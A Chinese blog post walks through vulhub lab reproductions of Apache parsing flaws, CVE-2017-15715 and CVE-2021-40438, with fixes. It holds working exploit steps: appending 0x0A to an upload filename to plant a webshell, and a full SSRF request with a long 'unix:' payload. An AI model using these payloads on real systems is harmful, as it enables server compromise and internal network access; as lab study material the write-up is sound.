Apache解析漏洞CVE-2017-15715、apache_parsing_vulnerability、CVE-2021-40438 vulhub复现分析

已于 2022-09-21 21:11:17 修改
阅读量2.7k 收藏 5
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: 安全 网络安全 安全架构 php apache
于 2022-09-20 21:25:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/126944152
版权

目录

前言:

(一)漏洞简介

Apache目录结构

(二)apache_parsing_vulnerability

1、漏洞原理

2、漏洞修复

2.1 在httpd.conf或httpd-vhosts.conf中加入以下语句,从而禁止文件名格式为.php.的访问权限

2.2 如果需要保留文件名,可以修改程序源代码,替换上传文件名中的“.”为“_”:

(三)CVE-2017-15715

1、 漏洞原理

2、漏洞复现

2.1 进入靶场

2.2 启动并查看端口号

2.3 查看配置

2.4  查看index.php文件中的php源码

2.5 BP抓包操作

  3、漏洞修复

(四)CVE-2021-40438

1、前置学习

1.1 mod_proxy 反向代理

1.2 Apache hook 机制

1.3 request_rec 结构

2、漏洞复现

1、进入靶场

 2、输入payload,BP抓包

前言:
 

        解析漏洞主要说的是一些特殊文件被IIS Apache Nginx 在某种情况下被解释成脚本文件格式的漏洞。
        如有不当,烦请评论捉虫,我会在第一时间响应并评论提示,谢谢。

(一)漏洞简介

        Apache文件解析漏洞与用户的配置有密切关系。严格来说,属于用户配置问题,其实apache本身根本不存在所谓的解析漏洞。

Apache目录结构

  1. bin:存放常用命令工具,如httpd
  2. cgi-bin:存放linux下常用命令,如xxx.sh
  3. error:错误记录
  4. htdocs:网站源码
  5. icons:网站图标
  6. manual:手册
  7. modules:扩展模块

(二)apache_parsing_vulnerability

1、漏洞原理

        Apache默认一个文件可以有多个以点分隔的后缀 , 当右边的后缀无法识别 ( 不在 mime.types ), 则继续向左识别。 当我们请求这样一个文件:1.php.aaa aaa -> 无法识别 , 向左 php -> 发现后缀是 php ,交给 php 处理这个文件最后一步虽然交给了php 来处理这个文件,但是 php 也不认识 .aaa 的后缀 , 不解析
        其实,解析漏洞的产生, 是由于运维人员在配置服务器时,为了使 apache 服务器能解析 php ,而自己添加一个handler 
AddType application/x­httpd­php .php

它的作用也是为了让 apache php 文件交给 php_module 解析 , 但是注意到它与 SetHandler: 它的后缀不是用正则去匹配的。所以 ,在文件名的任何位置匹配到php后缀,它都会让php_module解析。
感兴趣的可以去vulhub去复现一下,用phpstudy也可以复现

2、漏洞修复

        不要使用AddHandler, 改用 SetHandler, 写好正则 , 就不会有解析问题,

2.1 httpd.confhttpd-vhosts.conf中加入以下语句,从而禁止文件名格式为.php.的访问权限

<FilesMatch ".(php.|php3.|php4.|php5.)"> 
    Order Deny,Allow Deny from all 
</FilesMatch>

2.2 如果需要保留文件名,可以修改程序源代码,替换上传文件名中的“.”“_”

$filename = str_replace('.', '_', $filename);

(三)CVE-2017-15715

        Apache HTTPD是一款 HTTP 服务器,它可以通过 mod_php 来运行 PHP 网页。其 2.4.0~2.4.29 版本中存在一个解析漏洞,在解析PHP 时, 1.php\x0a 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策略。

1、 漏洞原理

  • Apache 这次解析漏洞的根本原因就是这个 $ ,正则表达式中,我们都知道 $ 用来匹配字符串结尾位置.
  • $符号: 匹配输入字符串的结尾位置。如果设置了 RegExp 对象的 Multiline 属性,则 $ 也匹配 '\n' 或 '\r'。 要匹配 $ 字符本身,请使用 \$。 
  • 如果设置MULTILINE标示,就当作换符处理,如果不设置就当作一行文本处理

我们打开httpd-php.conf,通过正则匹配到$结尾,刚刚那个只要有.php就解析

举个例子:

我们打开PyCharm,先写一个正常的123.php

再写非正常的试试,什么都没有匹配到

 添加\n换行符,成功绕过

2、漏洞复现

2.1 进入靶场

2.2 启动并查看端口号

IP+端口

2.3 查看配置

本次实验是 vulhub 下的,所以找到 apache 配置文件,路径在 /etc/apache2/ 下, apache2.conf apache 核心配置文件查看其文件发现如下代码:意思是包含这两个文件下的以conf 结尾的文件 
IncludeOptional conf­enabled/*.conf 
IncludeOptional sites­enabled/*.conf
跟进该文件发现关于 php 的配置文件为 docker-php.conf, 打开为如下: 
<FilesMatch \.php$> 
    SetHandler application/x­httpd­php 
</FilesMatch>
可以看到在正则中是 \.php$, 因为结尾有个 $ 符号,结合上述原理, $ 匹配配 '\n' '\r' ,所以我们修改数据包在文件名后加\n \n 的十六进制为 0a

2.4  查看index.php文件中的php源码

<?php if(isset($_FILES['file'])) 
    { 
        $name = basename($_POST['name']); 
        $ext = pathinfo($name,PATHINFO_EXTENSION); 
        if(in_array($ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) 
        { 
            exit('bad file'); }
            move_uploaded_file($_FILES['file']['tmp_name'], './' . $name); }
 else { 
?>
        分析代码文件名$name 是接受 POST 请求中的数据, POST 接收不会去掉我们添加的\n,如果使用 $_FILES['file']['name'] 去接收文件名,则会把 \n 去掉,所以要满足此漏洞的条件之一就是使用 POST接收文件名

 $ext等于POST中的文件名后缀,所以文件名不能是['php', 'php3', 'php4', 'php5', 'phtml', 'pht'],但是可以是 php\n的这种方式,就绕过了if判断。

2.5 BP抓包操作

1、首先访问漏洞页面,并且进行burp抓包,可以看到POST请求中nameevil.php

2 、将数据包进行修改在 evil.php 后面添加 \n 也就是十六进制 0A

 3、访问webshell使用工具连接

4、记得关闭docker

  3、漏洞修复

  1. 升级到最新版本
  2. 或将上传的文件重命名为为时间戳+随机数+.jpg的格式并禁用上传文件目录执行脚本权限
  3. 获取文件名时用“去掉换行的函数,比如 $_FILES['file']['name']
  4. httpd.conf中加入其他正则表达式。

(四)CVE-2021-40438

        Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中,mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址,进而导致SSRF漏洞。

1、前置学习

首先解释几个概念

1.1 mod_proxy 反向代理

        顾名思义,这个模块与其相关模块为 Apache HTTP Server 实现代理 / 网关。

        对于High-performance PHP on apache httpd 2.4.x using mod_proxy_fcgi and php-fpm 这种方式,本质就是 Apache 作为反代服务器用 mod_proxy_fcgi 这个子模块请求转发给 PHP-FPM ,而 PHP-FPM 监听的方式,也就是接收 Apache 转过去时处理 PHP 的请求的方式,有两种:

1、TCP Socket(ip and port)

ProxyPass / http://www.example.com:port

2、UDS (Unix Domain Socket)

只在Apache 2.4.7 及更高版本中支持。可以通过使用位于 unix:/path/app.sock| 前面的目标来支持使用 UDS 。例如,要代理 HTTP 并将 UDS 定位于 /home/www.socket ,应使用 unix:/home/www.socket|http://localhost/whatever/ 

ProxyPass / unix:/path/to/app.sock|http://example.com/app/name

对于反向代理而言, Apache 转发代理,也就是 Apache 发送请求给 PHP-FPM 的方式有三种,其中一种叫 ProxyPass ,这是指令,允许将远程服务器 Map 到本地服务器(反向代理 / 网关)的空间,对于不同监听方式的指令例子如上所示。

1.2 Apache hook 机制

        说起 Apache Module 不能不提起 Apache hook,想要处理请求,要做的第一件事就是在请求处理过程中创建一个 hook,所有处理程序,就比如我们上面说到的 mod_proxy ,都会被挂接到请求过程的特定部分。服务器本身是不知道哪个模块负责处理特定请求的,所以会询问每个模块是否对给定请求感兴趣。然后,由每个模块决定是否像身份验证 / 授权模块那样拒绝服务请求,接受服务请求或拒绝服务请求,就像下图一样

 为了使诸如 mod_example 之类的处理程序更容易知道 Client 端是否在请求我们应处理的内容,服务器具有用于向模块提示是否需要其协助的指令。其中两个是 AddHandler 和 SetHandler(在CVE-2017-15715也有提到

比如我们想通过创建合适的 Handler 传递,将请求强制处理为反向代理请求:

<FilesMatch "\.php$">
    # Unix sockets require 2.4.7 or later
    SetHandler  "proxy:unix:/path/to/app.sock|fcgi://localhost/"
</FilesMatch>

这个例子是使用反向代理将对 PHP 脚本的所有请求传递到指定的 FastCGI 服务器,和之前 UDS 的例子很相像,一个 Module 通常是在 Handler 中创建一个 hook,例如:

        如上,继而就会在 example_handler 这个函数中处理请求,mod_proxy 也有这样的 Handler 

1.3 request_rec 结构

        任何请求中最重要的部分是 request record 。在对处理程序函数的调用中,这由与进行的每次调用一起传递的 request_rec* 结构表示。该结构在模块中通常简称为 r ,包含模块完全处理任何 HTTP 请求并相应做出响应所需的所有信息。

         https://www.anquanke.com/post/id/263175

        Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸 | 离别歌

        Building a POC for CVE-2021-40438 – Firzens Blog

        Apache SSRF: an all-you-can-eat reverse proxy > Cydrill Software Security

         PHP 作为 Apache 的一个子模块来运行,用 LoadModule 加载模块,最主要的模块就是 mod_php,还有二种加载模块这里不做介绍,《Building a POC for CVE-2021-40438》这篇文章中提到了这个漏洞的复现方法:当目标环境使用了mod_proxy做反向代理,比如ProxyPass / "http://localhost:8000/",此时通过请求http://target/?unix:{'A'*5000}|http://example.com/即可向http://example.com发送请求,造成一个SSRF攻击。

(笔者能力有限,想研究具体代码审计过程可以看上面篇文章,等我研究明白了,再重新分享思路)

2、漏洞复现

1、进入靶场

 2、输入payload,BP抓包


GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/ HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close

 3、关闭环境

@Camelus
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
httpd已复现漏洞
qq_61142406的博客
05-28 754
CVE-2017-15715: 2.4.0~2.4.29 00截断,后缀名后面加0A,1.php后面加上一个空格,然后双击空格,右边出现hex进制,然后改成0A CVE-2021-41773: 目录穿越,Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录,配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。 文件读取 payl
Apache HTTP Server SSRF漏洞CVE-2021-40438复现
2301_76467680的博客
07-09 400
拉取环境访问页面pocGET /?Win64;x64;q=0.3,en;成功页面。
Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞(CVE-2021-40438)
weixin_44047654的博客
12-06 1881
Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞(CVE-2021-40438)
中间件安全Apache常见漏洞
最新发布
Innocence_0的博客
07-08 762
简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。apache
Apache HTTP Server SSRF漏洞CVE-2021-40438复现vulhub
qq_51398553的博客
06-21 1888
在反向代理模式下,客户端不知道真正的服务器是谁,只是向代理服务器发送请求,代理服务器再根据自己的策略将请求转发到目标服务器,目标服务器返回数据给代理服务器,代理服务器再将数据返回给客户端。2.在unix:与|之间输入的长度大概是4092个字符(多于4092个字符可以,少于也可以,但不能少于一定的字符,上面的是不能4069个字符,其他的没有实验,有知道的可以告诉我一下原因哈),即可构造出uds_path为null,让Apache不再发送请求给unix套接字。,拉取镜像,并查看服务相关信息。
Apache HTTPD 换行解析漏洞(CVE-2017-15715)与拓展
Firebasky的博客
08-17 565
之前就看了这个漏洞,但是当时没有认真思考叫因为只是一个%0a绕过就OK 没有理解原理,现在来填坑 环境启动与版本漏洞 1.在apache2.40~2.4.29版本中存在这个漏洞 2.这么我使用的是vulhub环境搭建 进入目录编译及运行漏洞环境: docker-compose build docker-compose up -d 启动后Apache运行在http://your-ip:8080** 漏洞原理 在该版本的配置中 <FilesMatch \.php$> SetHandler.
Apache HTTPD 换行解析漏洞CVE-2017-15715
wyzhxhn的博客
11-18 1594
Apache HTTPD 换行解析漏洞CVE-2017-15715) 只有黑名单过滤时可以利用,白名单不能利用
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
**CVE-2017-3506:Apache Struts2远程代码执行漏洞** Apache Struts2是一款广泛使用的开源Web应用框架,它为开发者提供了一种构建基于MVC(Model-View-Controller)模式的Java Web应用程序的方式。在2017年,Apache...
apache不能解析php文件_Apache-解析漏洞
weixin_39960793的博客
11-12 266
大家好,我是阿远,今天给大家分享一下Apache解析漏洞的原理Apache解析漏洞Apache中,访问:liuwx.php.360会从右往左识别后缀,存在解析漏洞的时候,会从右往左识别哪个能解析,360是不能被解析,然后往左识别到php就识别能解析,这就是Apache解析漏洞漏洞复现环境Windows Server 2003_x64ApachePhpStudy提示:如果物理主机Ping不通20...
CVE(2017-157152021-41773、2021-40438)漏洞复现
weixin_55843787的博客
03-24 4603
CVE(2017-157152021-41773、2021-40438)漏洞复现
Apache换行解析漏洞复现CVE-2017-15715
爱吃仡坨的Blog
10-13 2127
CVE-2017-15715 即为换行解析漏洞,此漏洞存在于Apache 2.4.0 - 2.4.29版本中;在解析PHP时,服务器会将shell.php%0a后缀之后带有空格的文件按照php后缀解析,从而可以绕过服务器的安全策略。
Apache解析漏洞
forinput的博客
03-01 118
Apache解析漏洞
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值